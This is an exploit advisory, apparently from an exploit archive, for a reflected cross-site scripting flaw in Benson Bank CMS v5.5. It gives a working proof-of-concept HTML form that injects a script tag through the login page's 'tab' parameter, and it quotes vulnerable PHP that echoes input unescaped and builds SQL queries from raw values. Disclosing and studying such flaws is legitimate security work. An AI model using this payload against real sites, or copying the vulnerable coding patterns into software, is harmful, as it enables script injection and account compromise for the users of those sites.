Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>*=============================================================| | Exploit Title: Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://topnew.net | | Download Link : http://downloads.sourceforge.net/sidu/bank55.zip | | Version : v 5.5 - 2015.09.09 | | Tested on: Kali Linux | | Date: 1 /1 / 2017 *=============================================================| | Exploit Code: | |<HTML> |<HEAD><TITLE>Benson Bank CMS v 5.5 - 2015.09.09 Cross Site Scripting</TITLE></HEAD> |<BODY> |<form action="http://127.0.0.1/7/bank55/login.php" method="get"> | <input type="hidden" name="tab" value="Login'"/><ScRiPt >alert('M.R.S.L.Y')</ScRiPt>"/> |</form> |</BODY> |</HTML> *=======================| |Vulnerable code : | |function main($u, $p, $p1, $p2, $tab) { | if ($u == 'logout') { | global $pin; | $u = $pin[0]; | if ($u) { | cms_sql('update', 'bsb_account', null, null, "sid='$u.$u',updated='".date('Y-m-d H:i:s')."' where pid=$u"); | setcookie('BSB', '', time() - 1); | } | } | $u = ceil($u); $p = trim($p); | if ($u < 1) $u = ''; | if ($tab == 'Login' && $u && $p) { | $err = valid_data_login($u, $p); | if (!$err) return main_jump_login($u, $auto, $url); | } | uppe(); | $tabs = array('Login'=>lang(2505), 'Apply'=>lang(2507), 'PWD'=>lang(2506), 'Change'=>lang(2513)); | echo cms_form(), "<div style='max-width:400px;margin:0 auto'>"; | nav1_guest($tab); | echo "<ul class='tab'>"; | if (!$tab) $tab = 'Login'; | foreach ($tabs as $k => $v) echo ($k == $tab ? "<li class='on'>$v</li>" : "<li><a href='login.php?tab=$k'>$v</a></li>"); | echo "</ul><div class='tab'>"; | if ($tab == 'Login') main_form_login($u, $p, $err); | elseif ($tab == 'Apply') main_apply($u, $p, $p1); | elseif ($tab == 'PWD') main_pwd($u); | elseif ($tab == 'Change') main_change($u, $p, $p1, $p2); | echo '</div></div></form>'; | down(); | } | *=============================================================| | Discovered By : M.R.S.L.Y *=============================================================| </BODY></HTML>